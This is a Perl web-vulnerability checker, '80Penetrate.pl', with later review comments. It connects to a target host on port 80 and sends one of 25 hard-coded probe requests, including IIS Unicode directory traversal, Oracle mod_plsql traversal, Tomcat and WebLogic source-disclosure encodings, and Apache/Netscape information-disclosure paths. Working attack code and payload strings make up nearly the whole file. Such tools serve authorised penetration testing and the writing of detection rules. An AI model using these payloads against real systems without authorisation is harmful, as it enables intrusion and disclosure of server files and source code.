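# 80Penetrate.pl : Web Vulnerability Check for Level 1 Testing
# Triosec , SecNiche.org
#
# Connects to TCP port 80 of the host given as the first argument, sends the
# single fixed HTTP/1.0 request selected by the second argument (a two
# character request code, A1 .. C7), prints whatever the server answers and
# closes the connection.
#
# Every probe is a constant string held in %REQUEST_FOR below, so the same
# request paths can be used as match patterns when reviewing web-server
# access logs or writing detection rules for this tool's traffic.

use strict;
use warnings;
use IO::Socket;

# Request code => exact bytes written to the socket.
# The strings are kept as the author wrote them (including trailing blanks
# and the bare "\n\n" terminator) except where a comment says otherwise.
my %REQUEST_FOR = (
    # [Apache TomCat]
    A1 => "GET /file.js%70 HTTP/1.0 \n\n",
    A2 => "GET /file%252ejsp HTTP/1.0 \n\n",

    # [BEA WebLogin Case Sensitive File Extension]
    A3 => "GET /file.JSP /HTTP/1.0 \n\n",
    A4 => "GET /file.Jsp /HTTP/1.0 \n\n",
    A5 => "GET /file.jsP /HTTP/1.0 \n\n",

    # [Oracle Internet Application Server]
    A6 => "GET /WebDB/admin_/ HTTP/1.0 \n\n",

    # [Oracle 9i Application Server mod_plsql]
    # NOTE(review): the usage text shows three trailing slashes, the request
    # sent here has four -- left as written, confirm which one is intended.
    A7 => "GET /pls/sample/admin_/help/..%255c//// HTTP/1.0\n\n",

    # [Netscape Enterprise Server /?wp-cs-dump ]
    A8 => "GET /?wp-cs-dump HTTP/1.0\n\n",
    A9 => "GET /?wp-ver-info HTTP/1.0 \n\n",
    B1 => "GET /?wp-html-rend HTTP/1.0\n\n",

    # [Netscape Enterprise Server INDEX]
    B2 => "INDEX / HTTP/1.0 \n\n",

    # [BEA Web Logic]
    B3 => "GET /%00/ HTTP/1.0 \n\n",
    B4 => "GET /%2e/ HTTP/1.0 \n\n",
    B5 => "GET /%2f/ HTTP/1.0 \n\n",
    # Fixed: the original sent /%2f/ here, duplicating B5, although the
    # usage text documents B6 as /%5c/.
    B6 => "GET /%5c/ HTTP/1.0 \n\n",

    # [Microsoft IIS Unicode]
    B7 => "GET /scripts/..%c1%1c../*.* HTTP/1.0 \n\n",
    B8 => "GET /scripts/..%c0%9v../*.* HTTP/1.0 \n\n",
    # NOTE(review): B9 and C1 .. C7 are sent with a leading blank that the
    # usage text does not show -- left as written, confirm whether intended.
    B9 => " GET /scripts/..%c0%af../*.* HTTP/1.0 \n\n",

    # [Apache Webserver]
    C1 => " GET /.DS_Store HTTP/1.0 \n\n",
    C2 => " GET /.FBCIndex HTTP/1.0 \n\n",
    C3 => " GET /?M=A HTTP/1.0 \n\n",
    C4 => " GET /?S=D HTTP/1.0 \n\n",
    C5 => " GET /cgi-bin/test-cgi?/* HTTP/1.0 \n\n",
    C6 => " GET //WEB-INF/ HTTP/1.0 \n\n",
    C7 => " GET /%3f.jsp HTTP/1.0 \n\n",
);

# Help text.  Changes from the original: the script name now matches the file
# header, the usage line names both required arguments, and the example host
# is an RFC 5737 documentation address instead of a routable one.
my $USAGE = <<'END_USAGE';

[*] Usage:- 80Penetrate.pl <Target Server> <Request Type>

[Apache TomCat]
Request Type A1 = GET /file.js%70 HTTP/1.0
Request Type A2 = GET /file%252ejsp HTTP/1.0

[BEA WebLogin Case Sensitive File Extension]
Request Type A3 = GET /file.JSP /HTTP/1.0
Request Type A4 = GET /file.Jsp /HTTP/1.0
Request Type A5 = GET /file.jsP /HTTP/1.0

[Oracle Internet Application Server]
Request Type A6 = GET /WebDB/admin_/ HTTP/1.0

[Oracle 9i Application Server mod_plsql]
Request Type A7 = GET /pls/sample/admin_/help/..%255c/// HTTP/1.0

[Netscape Enterprise Server /?wp-cs-dump ]
Request Type A8 = GET /?wp-cs-dump HTTP/1.0
Request Type A9 = GET /?wp-ver-info HTTP/1.0
Request Type B1 = GET /?wp-html-rend HTTP/1.0

[Netscape Enterprise Server INDEX]
Request Type B2 = INDEX / HTTP/1.0

[BEA Web Logic]
Request Type B3 = GET /%00/ HTTP/1.0
Request Type B4 = GET /%2e/ HTTP/1.0
Request Type B5 = GET /%2f/ HTTP/1.0
Request Type B6 = GET /%5c/ HTTP/1.0

[Microsoft IIS Unicode]
Request Type B7 = GET /scripts/..%c1%1c../*.* HTTP/1.0
Request Type B8 = GET /scripts/..%c0%9v../*.* HTTP/1.0
Request Type B9 = GET /scripts/..%c0%af../*.* HTTP/1.0

[Apache Webserver]
Request Type C1 = GET /.DS_Store HTTP/1.0
Request Type C2 = GET /.FBCIndex HTTP/1.0
Request Type C3 = GET /?M=A HTTP/1.0
Request Type C4 = GET /?S=D HTTP/1.0
Request Type C5 = GET /cgi-bin/test-cgi?/* HTTP/1.0
Request Type C6 = GET //WEB-INF/ HTTP/1.0
Request Type C7 = GET /%3f.jsp HTTP/1.0

-------------------------------------------
Example:- 80Penetrate.pl 192.0.2.10 A1
END_USAGE

print STDOUT "\n";
print STDOUT "80Penetrate By zeroknock [at] secniche.Org\n";
print STDOUT "http://triosec.org\n";
print "\n";
print STDOUT "[*] Web Vulnerability Checker for Level 1 Testing.\n";

my ($host, $req_type) = @ARGV;

# Both arguments are required; without them show the help and stop.
if (not $req_type) {
    print $USAGE;
    exit;
}

# Look the code up by exact (case-insensitive) match.  The original used an
# unanchored pattern match per code, so a typo either matched nothing (the
# script connected and sent no request) or matched several branches and
# wrote to an already closed socket.
$req_type = uc $req_type;
my $request = $REQUEST_FOR{$req_type};
if (not defined $request) {
    print STDERR "[*] Unknown Request Type '$req_type' (valid codes: A1-A9, B1-B9, C1-C7)\n";
    exit 1;
}

print "\n\n";

my $remote = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => $host,
    PeerPort => "http(80)",
);
unless ($remote) { die "[*]Cannot Connect Daemon!\n" }
$remote->autoflush(1);

print "\n[*] Attacking With Request Code [$req_type]\n";
print "=====================================\n";
print {$remote} $request;

# The response comes from a server the operator does not control and goes
# straight to the terminal, so control bytes (ESC, BEL, NUL, ...) are shown
# as \xNN instead of being passed through; tab, CR and LF are kept.
while (my $line = <$remote>) {
    $line =~ s/([\x00-\x08\x0B\x0C\x0E-\x1F\x7F])/sprintf '\\x%02X', ord $1/ge;
    print $line;
}
close $remote;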